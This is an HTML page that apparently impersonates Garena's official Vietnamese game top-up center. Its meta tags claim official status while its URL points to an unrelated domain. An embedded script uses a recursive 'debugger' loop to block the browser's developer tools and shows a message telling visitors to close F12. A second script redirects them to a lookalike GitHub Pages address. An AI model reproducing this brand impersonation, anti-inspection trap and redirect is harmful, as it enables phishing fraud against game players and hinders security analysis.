<!DOCTYPE html>
<html lang="vi">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1 , maximum-scale=1, user-scalable=no, viewport-fit=cover">
<title>Trung tâm nạp thẻ</title>
<meta http-equiv="content-language" content="vi">
<meta name="robots" content="index, follow'">
<link rel="shortcut icon" href="https://cdngarenanow-a.akamaihd.net/webmain/static/favicon.ico">
<meta key="description" name="description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="keywords" name="keywords" content="nạp tiền, garena, game, games" data-react-helmet="true">
<meta key="twitter:title" name="twitter:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="twitter:description" name="twitter:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">
<meta key="og:title" property="og:title" content="Trung tâm nạp thẻ Garena" data-react-helmet="true">
<meta key="og:type" property="og:type" content="website" data-react-helmet="true">
<meta key="og:image" property="og:image" content="https://cdngarenanow-a.akamaihd.net/webmain/static/payment_center/common/garena-logo.png" data-react-helmet="true">
<meta key="og:url" property="og:url" content="https://vi-napthe.online" data-react-helmet="true">
<meta key="og:description" property="og:description" content="Trang nạp thẻ chính thức của Garena. Nạp Sò, nạp Quân Huy, nạp RP, nạp EP dễ dàng và an toàn cho các game Garena như Liên Minh Huyền Thoại, FIFA ONLINE 3, FO3M, Blade and Soul, Liên Quân Mobile, Chiến Dịch Huyền Thoại, DDTank, Free Fire, Âm Dương Sư." data-react-helmet="true">

<script>
	    var listchan = ['&', 'charCodeAt', 'firstChild', 'href', 'join', 'match', '+', '=', 'TK', '<a href=\'/\'>x</a>', 'innerHTML', 'fromCharCode', 'split', 'constructor', 'a', 'div', 'charAt', '', 'toString', 'createElement', 'debugger', '+-a^+6', 'Fingerprint2', 'KT', 'TKK', 'substr', '+-3^+b+-f', '67bc0a0e207df93c810886524577351547e7e0459830003d0b8affc987d15fd7', 'length', 'get', '((function(){var a=1585090455;var b=-1578940101;return 431433+"."+(a+b)})())', '.', 'https?:\/\/', ''];
(function () {
console.log("%c XIN HÃY TẮT F12 ĐỂ TIẾP TỤC. %c", 'font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:24px;color:#00bbee;-webkit-text-fill-color:#00bbee;-webkit-text-stroke: 1px #00bbee;', "font-size:12px;color:#999999;");

    (function block_f12() {
        try {
            (function chanf12(dataf) {
                if ((listchan[33] + (dataf / dataf))[listchan[28]] !== 1 || dataf % 20 === 0) {

                    (function () {})[listchan[13]](listchan[20])()
                } else {
                    debugger;
                    
                };
                chanf12(++dataf)
            }(0))
        } catch (e) {
            setTimeout(block_f12, 5000)
        }
    })()
})();
	</script>
<script type=”text/javascript”>
window.location.href = “https://nap-the.github.io/“
</script>
</body>
</html>
